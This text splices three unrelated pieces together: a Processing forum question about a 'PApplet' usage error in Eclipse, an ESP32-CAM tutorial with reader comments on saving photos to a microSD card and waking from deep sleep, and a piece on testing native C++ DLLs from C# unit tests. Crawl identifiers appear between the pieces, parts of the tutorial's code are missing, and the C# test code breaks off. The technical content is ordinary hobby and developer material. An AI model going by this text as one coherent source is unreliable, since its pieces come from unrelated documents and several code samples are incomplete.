We are about to switch to a new forum software. Until then we have removed the registration on this forum. I am working only since a short time with Processing. I always get this error message: Usage: PApplet <appletname> For example I am using these 2 Java-files in a project: Main.java: `package de.hpi.javaide.firststeps; import processing.core.PApplet; public class Main { public static void main(String[] args) { PApplet.main(new String[]{"--present", "de.hpi.javaide.firststeps.Game"}); } } ` Game.java: package de.hpi.javaide.firststeps; import processing.core.PApplet; @SuppressWarnings("serial") public class Game extends PApplet { @Override public void setup() { noStroke(); fill(255, 10, 10); rectMode(CORNER); rect(5, -100, 20, 10); } @Override public void draw() { } } These files come from a course of OpenHPI. Last year processing worked without any problem. Now I get the above shown error code when using any java file using process. I am using eclipse neon, java version "1.8.0_161" and core.jar (version 3) Any help appreciated! Thanks in advance for your help! Answers I suspect the problem is that the source code you are working with is written for Processing 2. With Processing 3 and Eclipse Neon you Game class should look like this Thank You very much for Your answer. I suspected this also as a cause of my problem. But the solution of the problem was, taht when clicking 'Run' in eclipse You have to configure 'Run' and select 'Main.java'. When clicking 'Run' 'PApplet.java' is used, for what reason ever. Doing so using 'stup()' and not 'settings()' it works nevertheless. Thanks for Yout quick support. I have learned some new things.
https://forum.processing.org/two/discussion/27648/error-message-usage-papplet
CC-MAIN-2019-35
refinedweb
276
70.29
Learn how to take photos with the ESP32-CAM board and save them to a microSD card using Arduino IDE. When you press the ESP32-CAM RESET button, it wakes up, takes a photo and saves it in the microSD card. We’ll be using the ESP32-CAM board labelled as AI-Thinker module, but other modules should also work by making the correct pin assignment in the code. The ESP32-CAM board is a $9 device (or less) that combines an ESP32-S chip, an OV2640 camera, a microSD card slot and several GPIO pins. For an introduction to the ESP32-CAM, you can follow the next tutorials: - ESP32-CAM Video Streaming and Face Recognition with Arduino IDE - ESP32-CAM Video Streaming Web Server (works with Home Assistant, Node-RED, etc…) - ESP32-CAM Troubleshooting Guide Watch the Video Tutorial To learn how to take photos with the ESP32-CAM and save them in the microSD card, you can watch the following video tutorial or keep reading this page for the written instructions and all the resources. Parts Required To follow this tutorial you need the following components: - ESP32-CAM with OV2640 - MicroSD card - Here is a quick overview on how the project works. - The ESP32-CAM is in deep sleep mode - Press the RESET button to wake up the board - The camera takes a photo - The photo is saved in the microSD card with the name: pictureX.jpg, where X corresponds to the picture number - The picture number will be saved in the ESP32 flash memory so that it is not erased during RESET and we can keep track of the number of photos taken._3<< 2. A new window pops up. Select FAT32, press Start to initialize the formatting process and follow the onscreen instructions. >>IMAGE. You can follow one of the next tutorials to install the ESP32 add-on, if you haven’t already: - Installing the ESP32 Board in Arduino IDE (Windows instructions) - Installing the ESP32 Board in Arduino IDE (Mac and Linux instructions) Take and Save Photo Sketch Copy the following code to your Arduino IDE. /********* Rui Santos Complete project details at IMPORTANT!!! - Select Board "ESP32 Wrover Module" - Select the Partion Scheme "Huge APP (3MB No OTA) -" #include <EEPROM.h> // read and write from flash memory // define the number of bytes you want to access #define EEPROM_SIZE 1 // ESP32-CAM white on-board LED (flash) connected to GPIO 4 pinMode(4, OUTPUT); digitalWrite(4, LOW); rtc_gpio_hold_en(GPIO_NUM_4); delay(2000); Serial.println("Going to sleep now"); delay(2000); esp_deep_sleep_start(); Serial.println("This will never be printed"); } void loop() { } The code starts by including the necessary libraries to use the camera. We also include the libraries needed to interact with the microSD card: " And the EEPROM library to save permanent data in the flash memory. #include <EEPROM.h> If you want to learn more about how to read and write data to the flash memory, you can follow the next tutorial: Define the number of bytes you want to access in the flash memory. Here, we’ll only use one byte that allows us to generate up to 256 picture numbers. #define EEPROM_SIZE 1 Then, define the pins for the AI-THINKER camera module. // Note: you might need to change the pin definition depending on the board you’re using. Wrong pin assignment will result in a failure to init the camera. Initialize an int variable called pictureNumber that that will generate the photo name: picture1.jpg, picture2.jpg, and so on. int pictureNumber = 0; All our code is in the setup(). The code only runs once when the ESP32 wakes up (in this case when you press the on-board RESET button). Define; Use the following settings for a camera with PSRAM (like the one we’re using in this tutorial). if(psramFound()){ config.frame_size = FRAMESIZE_UXGA; // FRAMESIZE_ + QVGA|CIF|VGA|SVGA|XGA|SXGA|UXGA config.jpeg_quality = 10; config.fb_count = 2; } If the board doesn’t have PSRAM, set the following: else { config.frame_size = FRAMESIZE_SVGA; config.jpeg_quality = 12; config.fb_count = 1; } Initialize the camera: // Init Camera esp_err_t err = esp_camera_init(&config); if (err != ESP_OK) { Serial.printf("Camera init failed with error 0x%x", err); return; } Initialize the microSD card: //Serial.println("Starting SD Card"); if(!SD_MMC.begin()){ Serial.println("SD Card Mount Failed"); return; } uint8_t cardType = SD_MMC.cardType(); if(cardType == CARD_NONE){ Serial.println("No SD Card attached"); return; } More information about how to use the microSD card can be found in the following project: The following lines take a photo with the camera: camera_fb_t * fb = NULL; // Take Picture with Camera fb = esp_camera_fb_get(); if(!fb) { Serial.println("Camera capture failed"); return; } After that, initialize the EEPROM with the size defined earlier: EEPROM.begin(EEPROM_SIZE); The picture number is generated by adding 1 to the current number saved in the flash memory. pictureNumber = EEPROM.read(0) + 1; To save the photo in the microSD card, create a path to your file. We’ll save the photo in the main directory of the microSD card and the file name is going to be (picture1.jpg, picture2.jpg, picture3.jpg, etc…). String path = "/picture" + String(pictureNumber) +".jpg"; These next lines save the photo in the microSD card:(); After saving a photo, we save the current picture number in the flash memory to keep track of the number of photos taken. EEPROM.write(0, pictureNumber); EEPROM.commit(); When the ESP32-CAM takes a photo, it flashes the on-board LED. After taking the photo, the LED remains on, so we send instructions to turn it off. The LED is connected to GPIO 4. pinMode(4, OUTPUT); digitalWrite(4, LOW); rtc_gpio_hold_en(GPIO_NUM_4); Finally, we put the ESP32 in deep sleep. esp_deep_sleep_start(); Because we don’t pass any argument to the deep sleep function, the ESP32 board will be sleeping indefinitely until RESET. ESP32-CAM Upload Code To upload code to the ESP32-CAM board, connect it to your computer using an FTDI programmer. Follow the next schematic diagram: Important: GPIO 0 needs to be connected to GND so that you’re able to upload code. Important: some ESP32-CAM boards operate at 5V, so if you can’t upload code, you may need to power with 5V to make it work. To upload the code, follow the next steps: - Go to Tools > Board and select ESP32 Wrover Module - Go to Tools > Port and select the COM port the ESP32 is connected to - In Tools > Partition Scheme, select “Huge APP (3MB No OTA)“ - Press the ESP32-CAM on-board RESET button - Then, click the upload button to upload the code Important: if you can’t upload the code, double-check that GPIO 0 is connected to GND and that you selected the right settings in the Tools menu. You should also press the on-board Reset button to restart your ESP32 in flashing mode. Demonstration After uploading the code, remove the jumper that connects GPIO 0 from GND. Open the Serial Monitor at a baud rate of 115200. Press the ESP32-CAM reset button. It should initialize and take a photo. When it takes a photo it turns on the flash (GPIO 4). Check the Arduino IDE Serial Monitor window to see if everything is working as expected. As you can see, the picture was successfully saved in the microSD card. Note: if you’re having issues with the ESP32-CAM, take a look at our troubleshooting guide and see if it helps: ESP32-CAM Troubleshooting Guide: Most Common Problems Fixed After making sure that everything is working as expected, you can disconnect the ESP32-CAM from the FTDI programmer and power it using an independent power supply. To see the photos taken, remove the microSD card from the microSD card slot and insert it into your computer. You should have all the photos saved. The quality of your photo depends on your lighting conditions. Too much light can ruin your photos and dark environments will result in many black pixels. tutorial useful and you are able to use it in your projects. If you don’t have an ESP32-CAM board, you can click here to get one. As mentioned previously, we have other tutorials about the ESP32-CAM that you may like: - ESP32-CAM Video Streaming and Face Recognition with Arduino IDE - ESP32-CAM Video Streaming Web Server (works with Home Assistant) - Quick Overview: ESP32-CAM with OV2640 Camera - Where to buy the ESP32-CAM Learn more about the ESP32 with our “Learn ESP32 with Arduino IDE” course or check our ESP32 free resources. Thank you for reading. 107 thoughts on “ESP32-CAM Take Photo and Save to MicroSD Card” excelent job Rui ,thanks for sharing this project.73 de 9a3xz -Mikele You’re welcome. Regards, Sara The codes works perfectly.!! My problem now is how can i send the image from sd card via email attachment using by using the same esp32-cam. Please help me!! Hi. That’s one of our future projects (or similar). But at the moment, we don’t have any tutorial about that. Regards, Sara I’m also waiting for a tutorial on sending an email attachment from a photo on SD card. Hi Malcom. That will be one of our future projects. But we don’t have it completed yet. Regards, Sara Hi dear; I would like access saved sd card photo by web browser. for example. I will connect button on board , press button take a photo save to sd card capture1.jpg, press again save second photo capture2.jpg. (only 2 photos record) will access address/capture1.jpg and address/capture2.jpg. how can I do it? thanks for your kind support. Hi. At the moment, we don’t have any example about that. That will be one of our future projects. So, stay tuned! Regards, Sara very interesting project, i just want to ask? if i want to keep streaming use web server what should i do? This project streams and takes photos: The only part missing is saving the photo to the SD card. Maybe if you follow both tutorials you can make what you want. Regards, Sara Good! Congratulations!! I’m findig how to make this but instead using reset to take photo, program a time lapse photo, from 5 to 60 sec, storaging them in SDcard. Can you think about it? Thanks! Hi Frank. That’s a very interesting project. I think you just need to create a timer that triggers a function that takes the photo and saves to the microSD card. And put everything in the loop. I’ll think about your project, and maybe create a tutorial in the future. REgards, Sara Rui,i m so sorry ,i m radio man no digital 🙂 when i try to compile this sketch ,arduino 1.8.5 tell me : Board esp32wrover (platform esp32, package esp32) is unknown Error compiling for board ESP32 Wrover Module. Hi Mikele. I’m sorry for the delay in my response. Were you able to fix this issue? What other information do you get in the serial monitor? Regards, Sara no no Sara,everything is ok…. now i can compile sketch and waiting esp32-cam board from ebay,all is ok 😉 🙂 all the best for you and Rui ,see you 😉 73 de 9a3xz-Mikele-Croatia Great! Thank you for following our work 😀 Hello Rui, I’m a great fan of your blog, and bought several of your books and courses. I found this post if this can help for shutting down the LED : Also I would like to build a system that takes a picture of animal passing by a path. I was thinking to add an IR motion sensor or an external command by a light barrier to the SD card recording system you described. Could you please make a post of such a system ? Thanks in advance, Claude Thank you for sharing that solution. At the moment, we weren’t able to interface the PIR sensor with the EPS32-CAM. But we’ll try again and create a new tutorial about that if we succeed. Regards, Sara LED pin output needs to be set LOW then HOLD to keep it off during sleep. Disable HOLD after wakeup to use the pin again. pinMode(4, OUTPUT); digitalWrite(4, LOW); rtc_gpio_hold_en(GPIO_NUM_4); delay(500); esp_deep_sleep_start(); rtc & digital io pin state can be maintained during hibernation with these two functions: rtc_gpio_hold_en rtc_cntl_dg_pad_force_hold More info: esp32.com/viewtopic.php?t=1966 Thanks for sharing. I’ve included the following: #include “driver/rtc_io.h” Then, used: rtc_gpio_hold_en(GPIO_NUM_4); To keep GPIO LOW during deep sleep as you suggested in your previous comment. It worked! So, I updated the code! Thank you 😀 Very nice! Could the sketch be modified to be triggered by connecting one of the gpio pins to ground instead of pressing the reset button? This would make it useful in an application in which a remote switch is used to trigger. Thanks you guys make a cute couple I am struggling getting a PIR sensor to wake the esp32 from deep sleep. Is it possible the camera configuration is interfering with it? Thank you for your comment. We’ve tried interfacing the camera with the PIR motion sensor. But when using the SD card, there are almost no pins left to connect the PIR motion sensor. The pins left didn’t work with the sensor: the ESP-CAM crashed. So, we weren’t successful yet to interface a PIR. But will try again. Regards, Sara Instead of pressing the reset button’ I owuld like to activate the camera by a movement sensor for example in order to watch the house… Thanks for an interesting project. Thank you for the suggestion. We’ll be working on something like that. Regards, Sara Good afternoon. Excellent example. But the author did not adjust the matrix OV2640. I added this code: // Set camera sensor sensor_t * s = esp_camera_sensor_get(); s->set_framesize(s, MY_FRAMESIZE); s->set_quality(s, MY_QUALITY); s->set_contrast(s, 0); s->set_brightness(s, 0); s->set_saturation(s, 0); s->set_gainceiling(s, GAINCEILING_16X); s->set_colorbar(s, 0); s->set_whitebal(s, 0); s->set_hmirror(s, 0); s->set_vflip(s, 0); s->set_ae_level(s, 0); s->set_special_effect(s, 0); s->set_wb_mode(s, 2); s->set_awb_gain(s, 1); s->set_bpc(s, 1); s->set_wpc(s, 1); s->set_raw_gma(s, 1); s->set_lenc(s, 0); s->set_agc_gain(s, 1); s->set_aec_value(s, 600); s->set_gain_ctrl(s, 0); s->set_exposure_ctrl(s, 0); s->set_aec2(s, 1); s->set_dcw(s, 0); all the pins i try seem to use as wake (ext0) seem to interrupt either the camera or the sd card 🙁 Thanks for this great tutorial. Could you explain how to connect external spi device (ex: tft ST7735) I have tryied multiple pin conbinaison without success. Hi. You need to check what pins are being used by the camera. You can’t use those. Then, if you’re using the microSD card, you can’t also use those pins. So, there are little pins left to connect an external SPI device. Take a look at the pins used by the board and see if you have some left that can be used with your peripherals. Here are the pins (page 3): loboris.eu/ESP32/ESP32-CAM%20Product%20Specification.pdf Regards, Sara Please let me know if you figure out what pins to use that dont cause a crash. I am having trouble getting the SD card to mount after deep sleep. Hi. You need to add rtc_gpio_hold_dis(GPIO_NUM_4); before initializing the microSD card, to “unhold” the state of GPIO 4. Regards, Sara Hello, very cool the design of the camera. Thank you for sharing another project and increasing our field of knowledge. Thank you 😀 In regards to waking after deep sleep and the SD card not mounting: The code you have posted forces GPIO4 to hold its value in this line: rtc_gpio_hold_en(GPIO_NUM_4); This pin is used for SD card interface. You need to un-hold it after deep sleep wakeup if you want to use the pin again. I used gpio 13 pin D3 to make the PIR sensor work. I also removed the light hold.. I would like the light to be off during deep sleep. When I figure it out I will post some pictures of what I rigged up if people want. Thanks again. Hi David. Yes, please share your results with us. Were you able to use GPIO 13 as an interrupt without the ESP crashing? Regards, Saracourse I use this code before deep sleep: esp_sleep_enable_ext0_wakeup(GPIO_NUM_13,1); cheers, David course I use this code before deep sleep: esp_sleep_enable_ext0_wakeup(GPIO_NUM_13,1); cheers, David here is a working link This is a nice forum btw 🙂 looking at it now I am not sure what the 10k resistor does. I have tested it multiple times and it is definitely how i have it wired up though… Hi David. Thank you so much for sharing. I would like to give it a try and maybe create a tutorial about that. Can you share the code that you are running on the ESP32-CAM? You can use pastebin for example to share your code. Would you mind if we used that information to create a new tutorial? Regards, Sara yes ofcourse make a tutorial if you want. Honestly though I was unable to get the PIR sensor to work well in sunlight but that may not be a problem for your project. Unfortunately I do not have the exact code on hand right now, but it is simply your code without the LED hold and with: esp_sleep_enable_ext0_wakeup(GPIO_NUM_13,1); I will make double sure that is right when I get home tomorrow morning. I was thinking of testing it again with a simple push button on the same pin just to be sure. Thanks, David Hello! I would like to disable the LED. How can I do? Thanks During the flash while it takes photo? I think you would need to edit the library that takes the photo with the ESP32-CAM Hello, I’ve succeed to compile successfuly the sketch in IDE following your instructions but I’m confused about loading in ESP32. How to power the ESP32 module please, because with the FTDI connected alone to USB, back pin 3.3V is around 4V and 5.0V is around 6V , Is the FTDI defective ? Or should the ESP32 powered with a separate power supply ? thanks for claryfying this point, Rgds, Hi. In our example, we’re powering the ESP32 using the 3.3V from the FTDI programmer connected to the 3.3V of the ESP32-CAM and it works well. Some people reported that the ESP32-CAM only worked well when powering with 5V through the 5V pin. You can also use a separated power supply up to 5V. Regards, Sara Hi.. can you helpme? SD 2G . Fat32 formated. like tutorial. the board works ok with the proyect (ESP32-CAM Video Streaming and Face Recognition) 18:57:51.475 -> Picture file name: /picture1.jpg 18:57:51.475 -> E (2403) sdmmc_cmd: sdmmc_read_sectors_dma: sdmmc_send_cmd returned 0xffffffff 18:57:51.475 -> E (2404) diskio_sdmmc: sdmmc_read_blocks failed (-1) 18:57:52.500 -> E (3409) sdmmc_req: sdmmc_host_wait_for_event returned 0x107 18:57:52.500 -> E (3409) sdmmc_cmd: sdmmc_read_sectors_dma: sdmmc_send_cmd returned 0x107 18:57:52.500 -> E (3410) diskio_sdmmc: sdmmc_read_blocks failed (263) Thanks. Solved. My mistake: call. pinMode(4, OUTPUT); digitalWrite(4, LOW); before take next image. in loop. I am not able to figure out what is the code that goes in to the loop, is there anyway that you can share it?. Thanks. Hello, Excellent article. Can the reset button be replaced by a PIR motion sensor? how to send photos from a memory card to the web or database, thank you Hi Wido. That will be one of our next projects. But at the moment, we don’t have anything about that subject. Regards, Sara The article says an a.i. thinker module is being used….but top of code say “Wrover”. Please explain? Thanks, Curt Wells Hi. In our first ESP32-CAM projects, the AI-thinker module wasn’t defined in the Boards menu at the time. Now, you should be able to find the AI-Thinker module on the Boards menu. However, you can select either board and it should work. Regards, Sara I tried to make the ESP32-CAM to wake up after some time (1 minute), I upload the sketch and put it to work. The first picture is taken by the ESP32-CAM, then it goes to sleep. When it wakes up, the ESP32-CAM tries to access the MicroSD Card and returns the message: E (7143) sdmmc_sd: sdmmc_check_scr: send_scr returned 0xffffffff SD Card Mount Failed But if I press Reset, it works normally (the picture is taken). Hi Eduardo. Try to add the following at the beginning of the setup(): pinMode(4, INPUT); digitalWrite(4, LOW); rtc_gpio_hold_dis(GPIO_NUM_4); Then, tell me if it solved your issue. Regards, Sara Fantastic Sara! It now works perfectly!!! You guys saved my sunday! Thank you very much! How can the brightness of the flash lamp (led) be changed ? Thanks In order to upload a photo to a server, how can a post request be added to one of the esp32-cam projects ? I know how to add a received file manager to the server, but all the examples I find with a google search use a client form to upload – which requires a human to select a file on the client. I have the same doubt from Curt Wells. The solution which I figured myself was to save the picture taken by the camera in the SPIFFS and show the picture in the web server. I’m using Ngrok to publish my web server on the internet and so far it’s working. Thanks Eduardo, Could you provide some more info on how to do this ? Curt I really sorry for doing that, but right now this is the only thing I can do… But by sunday or monday I can write some more neater and post on my github. I think that it won’t be difficult to get some help with the other guys in this weekend. Again, sorry for the mess. But I assure that it works (its working right now) Thanks very much Eduardo. I will study your code and I think I will learn some Portuguese too ! Hi Curt! As I promissed, I made something much more neater and uploaded to a repo in my github. You can download, comment, ask change the code, or whaterever in it. Fell free to make you questions there, I will answer then. For Rui and Sara: PLEASE, ERASE THE OTHER POST WHICH I PUT A VERY LONG CODE. THAT CODE IS A REAL MESS. ALSO, YOU CAN USE THE CODE I UPLOADED TO GITHUB FOR WHATEVER YOU WANT. AS YOU GUYS CAN SEE, MANY YTHINGS ARE DERIVED FROM THE CODE SHOWN IN RUI’S BOIOK ‘LEARN ESP32 IN ARDUINO IDE’. Hi Eduardo. Thank you so much for sharing. We’ll take a look at your code and probably build a project about that. Regards, Sara Can anyone help me? How can I send the captured image from the SD card via Email attachment. Hi, May I ask a question? Compilation stops with the error message below. “error: dl_lib.h: No such file or directory” Is there any solution? Thanks a lot. try first putting the header (dl_lib.h) in brackets: #include “dl_lib.h” > #include . If that doesn’t work, try commenting the line: //#include “dl_lib.h”. For some people the first solution worked, for me, the second, without visible bad effects, the program work normally. I don’t know what function prototypes are in that header, since I don’t have it. fail to compile with arduino 1.8.9 here is the error message I get: Arduino: 1.8.9 (Linux), Board: “ESP32 Wrover Module, Huge APP (3MB No OTA), QIO, 80MHz, 921600, None” Build options changed, rebuilding all /home/david/Arduino/espcam/espcam.ino: In function ‘void setup()’: espcam:130:28: error: ‘rtc_gpio_hold_en’ was not declared in this scope rtc_gpio_hold_en(GPIO_NUM_4); ^ exit status 1 ‘rtc_gpio_hold_en’ was not declared in this scope This report would have more information with “Show verbose output during compilation” option enabled in File -> Preferences. Arduino: 1.8.9 (Linux), Board: “ESP32 Wrover Module, Huge APP (3MB No OTA), QIO, 80MHz, 921600, Non I cannot find the problem. Can you help Thank you for any help David Nelson Good afternoon, dear Sarah. Could you please tell me two main points to operate ESP32-CAM. I’m interested in how to lower the flash power or turn it off? It is not the best, but the energy demands and the problem I have is that the flash does not go off at all sometimes! Also you can show me how from *FB the picture to break into arrays on 10 bytes in order that I could send them on UART? Please help as soon as possible. Hi Dimka. To turn off the flash: include the following library: #include “driver/rtc_io.h” Then, add this in your setup(): pinMode(4, INPUT); digitalWrite(4, LOW); rtc_gpio_hold_dis(GPIO_NUM_4); before going to sleep use to keep the LED off: pinMode(4, OUTPUT); digitalWrite(4, LOW); rtc_gpio_hold_en(GPIO_NUM_4); I hope this helps. At the moment I don’t have any example to break the picture into arrays. Regads, Sara I know I can disable the library: #include “driver/rtc_io.h” And the led will not work. Another question is did photos 200 pictures become black with ripples, what to do? Hi thanks a lot for spending time to complete this project and sharing it. I’m having an esp32 module an ov7670 module and an SD CARD MODULE. Can I connect all these three as per code and use your code. Or is this code only for esp32cam module? Hi. I believe that if you make the same connections between the camera and the sd card as they are in the ESP32-CAM, the code should work, but I haven’t tried it. Regards, Sara Hi, I have a problem compiling the sketch which is the following: C: \ Users \ Joelon \ Documents \ Arduino \ libraries \ esp32cam-master \ src / dl_lib.h: In function ‘char * dstrdup (str_t)’: C: \ Users \ Joelon \ Documents \ Arduino \ libraries \ esp32cam-master \ src / dl_lib.h: 232: 11: error: expected unqualified-id before ‘new’ str_t new = dalloc (len); ^ C: \ Users \ Joelon \ Documents \ Arduino \ libraries \ esp32cam-master \ src / dl_lib.h: 233: 29: error: expected type-specifier before ‘,’ token return (str_t) memcpy (new, s, len); Could you help me with this library or with this problem Thanks in advance 🙂 Hi Joel. Some readers suggested the following to solve that issue: “For dl_lib.h: No such file or directory is because ESP32 Board Version 1.03 does’nt seem to include this anymore. Downgrade your ESP32 Board Version down to 1.02 in Andruino IDE or comment that line using version 1.03”. I hope this helps. Regards, Sara Thank you Sara Santos 😉 This issue happened here a while ago, but I solved in a much faster way than downgrading the “ESP32 boards” library. I don’t know why but (at least in my Arduino IDE) the ESP32 boards list appears twice in the Tools>Board menu. When I chose the “AI Thinker ESP32-CAM” in the first menu, I got this error. Then, I chose this board in the second menu and, like magic, everything worked like a charm. Don’t ask me why, but it worked… Thank you Sara Santos 😉 Hello, I would like to know if it is possible that after taking the photo do not send the esp32 to sleep, but the possibility of taking more photos without the need to restart the esp32 Yes Joel, its possible! I already asked something like that and got anwered here. I encapsulated the lines which takes a picture in a function (see it below): void take_picture(){ digitalWrite(4, HIGH); //Turn on the flash camera_fb_t * fb = NULL; // FB pointer if(!fb) { Serial.println(“Camera capture failed”); return; } // initialize EEPROM with predefined size EEPROM.begin(EEPROM_SIZE); pictureNumber = EEPROM.read(0) + 1; // Path where new picture will be saved in SD Card String path = “/foto_” + flash pinMode(4, OUTPUT); digitalWrite(4, LOW); } Then, in the loop() fucntion, I asked it to call the take_picture() function every 60 seconds. void loop() { take_picture(); // Wait 1 min delay(60000); } Thanks Eduardo, I would like to know if you could help me with the complete sketch code 🙂 Hi Joel, You just need to copy the sketch presented in this tutorail here and delete the repeated lines which I encapsulated in the function. Also, in the setup() function, delete these lines below: “` rtc_gpio_hold_en(GPIO_NUM_4); delay(2000); Serial.println(“Going to sleep now”); delay(2000); esp_deep_sleep_start(); Serial.println(“This will never be printed”); “` And nothing more! Rui and Sara did an excellent tutorial. Then you just need to upload the sketch and go ahead! Just let me know if you got any trouble. Hi Eduardo ;), when compiling the sketch it prints me on the serial port: “Camera capture failed” and does not save the photo in the sd, it is more I believe that it does not save it. I don’t know if you could help me with that ;). I’ll try to redo the tests I did before here. There’s a while since the last time I did this test; but I’ll figure out everything again! Hi again Joel, As I promissed, I built the circuit again and tested my sketch again. I have uploaded everything to this GitHub repo: As I said, I just made a slight change in Rui’s code. Now, it takes a picture and stays awake. It takes a picture every 60 seconds. I hope that now it will work! Thank you friend, the esp32 cam already works and take the photos and save them :), I send you a hug and take care You’re welcome! I’m glad that now it works. Any new ideias about how to extend this, feel free to ask or sugest. Just access the repo in the link that I sent before, and then open a new topic in the “issues tab” (the tab beside the selected tab, ” Code”); You don’t have to worry about it. New ideas are always welcome! Hugs for you too and take care! I would like to know if there is a way to access the microSd from a web page Hi Joel, To access the pictures of the SDcard in a webpage, probably is the same way that you access in a web page a picture saved in the SPIFFS of the ESP32. I already made a web page which takes a picture every minute and saves it in the SPIFFS of the ESP32-CAM and shows it on the web page. When I buit it, I didn’t figured any solution to work with many names and, so, when the ESP32-CAM took a picture, it overwritten the last one and showed in the web page only the newest one. You can check this project here: I understand Eduardo, let me check your project and if I can improve it I tell you 🙂 I already reviewed your Eduardo project, but I don’t know if you know if there is any way to read the file in binary and send it to the server on request http and decode it and save it on the server. Or some other way to do the same, I would appreciate any suggestions 🙂 Hi Joel, about reading the pictures in binary and sending/receiving it in http requests is a part beyond my knowledge… it is something in my wish list of next steps. If you know some place on web where teach this, I really will appreciate! Unfortunatelly this time I can’t help neither give any hints… but if you need anything else which I know or I which can find a solution more easily, don’t hesitate in asking me! Hi, can i upload a photo to a cloud with esp32 cam? Hi Gonzalo. Yes, you should be able to do that. But we don’t have that tutorial yet. Regards, Sara Thanks Sara. But you know if i can do it just with a esp32, without a server like raspberry pi? thanks so much for sharing this. Your tutorials have been impactful. great work Thank you so much 😀. Again, a Great tutorial! Code works fine…picture quality not the best, but, I bet soon they’ll come up with a camera with more megapixels. Hi, I can’t include #include “esp_camera.h”, it tells me No such file or directory. What should I do? I’ve written to you several times. I use arduino 1.8.10 and can’t find it Huge App (3Mb no OTA), but no OTA (large APP) which one should I use? Thanks and congratulations for your wonderful and functional projects. Hi Federico. I don’t know what can be the problem. Have you selected the right board before trying to compile the code? Bonjour, eh oui, un français ! (et en français) Tout d’abord MERCI pour vos très bons tutos ! Petit problème sur la dl_lib.h … qui n’existe plus : New ESP32 Arduino version (v 1.03) remove this file “dl_lib.h” (and some others). Depending the sketch, probabily you can just remove this line because in the examples I have been used this library is beeing included but no method or function from this files is used. Thanks for the tutorial! I did have a little trouble uploading my code to the ESP32, but after checking everything including the connections, ports. Checked the voltage I checked it all! On the final check, I found it, sometime during all my checking, I crossed the TX & RX connections, I wouldn’t have found if not for that final check. Thanks for what you do!
https://randomnerdtutorials.com/esp32-cam-take-photo-save-microsd-card/?replytocom=393806
CC-MAIN-2019-51
refinedweb
5,674
73.17
In the old days of code development, the developer would do several steps repeatedly: 1. edit the code 2. Save 3. Compile 4. Link 5. Deploy (if necessary) 6. Start (or switch to) the debugger 7. Start the app under the debugger. 8. Examine the code behavior changes with breakpoints and other debugger windows. This is quite tedious. Visual Studio does a lot to reduce these steps: Hit F5 and VS will automatically save, compile, link, deploy (usually), and start the debugger. But still, often it takes many repro steps or a long time to get the application to the target code. I really like TDD: Test Driven Development. Typically, the projects I work on consist of a Visual Studio Solution with multiple projects, and multiple project types. TDD allows me to execute the changed code much faster, and the code can be built in Release mode (so it’s much faster) and I don’t have to debug it: I just monitor the test log or test result. I spend a lot less time in the debugger or reproducing the steps to get to the code (Open a menu->Create a new Invoice, navigate to a line, enter a customer, etc.). The debugger is still able to step through the code, but it’s not really running the application, but just the target code. Plus, with TDD, when I’m done, the tests are the best defense mechanism for the code not breaking from another developer (or myself) changing the code later. The tests are also a great way for a new team member to get familiar with the code base and how it works. When I have a task to create some native code (C++) to add to the solution, I want to add tests of that native code to the existing C# or VB Test Projects. However, doing so requires a little fiddling to get it working. For example, if the test invokes the C++ code via P/Invoke (using DllImport) , then that code will be loaded into the test execution engine (e.g. “VsTest.executionEngine.x86.exe”) When I’m doing TDD, I want to quickly change the code and run the very fast test again. Can’t do that with TDD because the test execution process still has the DLL loaded, so you get an error message indicating that the code can’t be modified because it’s in use. You might think you could use a separate AppDomain to solve the problem, but that is cumbersome and works for managed DLLs only. Try out the code sample below. It uses LoadLibrary and FreeLibrary to load the native DLL directly, and allows you to change the code without needing to kill the execution process or restart VS. The sample target C++ code has a method called Return3 that just returns the integer 3. (I initially wanted to play around with regular expressions in C++). First, create a C# Test project: File->New->project->Visual C# ->Test->Unit Test Project Name it TestRegEx Build the project (Ctrl-Shift-B) Test->Window->Test Explorer This shows the default method “TestMethod1”, which we can run and it passes. Building results in the test being shown in Test->Windows->TestExplorer Now let’s add the C++ project: File->Add->New Project-> Visual C++->Win32 ->Win32 Project Name it CppRegEx In the wizard, choose Application Type: Dll, Finish. Paste in this code in CppRegEx.cpp: extern "C" int __declspec(dllexport) __stdcall Return3() { return 3; } In the CppRegEx project’s Post Build Event ((Right Click on CppRegEx project, Properties. For all configurations, Debug, Active, Release, or any you may have added) we want to copy the built native binary to where the test code can find it: xcopy /dy "$(TargetPath)" "$(SolutionDir)\TestRegEx" Because the command uses macros, it works for Debug and Release builds. Now build and the correct Dll will be copied to the Test folder. Now we need to add the C++ DLL as an item to the Test project that gets deployed, so it gets copied to the target directory. Right Click on the TestRegEx project->Add Existing Item, navigate to the build DLL in the TestRegEx folder, then change the Properties->Copy To OutputDirectory ->Copy If newer. Below is the full sample for the C++ target code and for C# Test project. Try to modify the code and run the test. (Ctrl-R +T runs the test under the cursor, Ctrl-R + L repeats the last test run) Now if you change the C++ code the change is reflected in the test. (I’ve found that I have to manually invoke a C++ build (Ctrl-Shift-B) first. You can see the CPP file being compiled in the Output Window (Build panel)) I use this technique to try out various C++ code fragments You can also debug into the native code: For the test project->Properties->Debug-> Enable Native Code Debugging. <C++ code> // CppRegEx.cpp : Defines the exported functions for the DLL application. // #include "stdafx.h" #include <regex> extern "C" int __declspec(dllexport) __stdcall Return3() { return 3; } using namespace std; extern "C" int __declspec(dllexport) __stdcall ReturnRegEx(WCHAR *pString, WCHAR *pRegEx) { wcmatch match; wstring str(pString); wregex reg(pRegEx); auto res = regex_match(pString, match, reg); return (int)res; } extern "C" int __declspec(dllexport) __stdcall ReturnRegExMany(int nIter, WCHAR *pString, WCHAR *pRegEx) { int retval = 0; wcmatch match; wstring str(pString); wregex reg(pRegEx); for (int i = 0; i < nIter; i++) { auto res = regex_match(pString, match, reg); retval = (int)res; } return retval; } </C++ code> <C# Test Code> using System; using Microsoft.VisualStudio.TestTools.UnitTesting; using System.Runtime.InteropServices; using System.IO; namespace TestRegEx { [TestClass] public class UnitTest1 { [TestMethod] public void TestMethod1() { using (var x = new DynamicDllLoader("CppRegEx.dll")) { var res = NativeMethods.Return3(); Assert.AreEqual(res, 3, "length not equal " + res.ToString()); } } [TestMethod] public void TestRegEx() { using (var x = new DynamicDllLoader("CppRegEx.dll")) { var str = "igdasdf.dll"; str = str.ToLowerInvariant(); var regex = @"(^asdf(.*)|^fdsa (.*)|^fdasd(.*)|^fddd(.*))\.dll"; var resNative = NativeMethods.ReturnRegEx(str, regex); var resManaged = System.Text.RegularExpressions.Regex.Match(str, regex); var resM = resManaged.Success ? 1 : 0; Assert.AreEqual(resNative, resM, "result not equal " + resNative.ToString()); Assert.AreEqual(resNative, 1, "is false"); } } 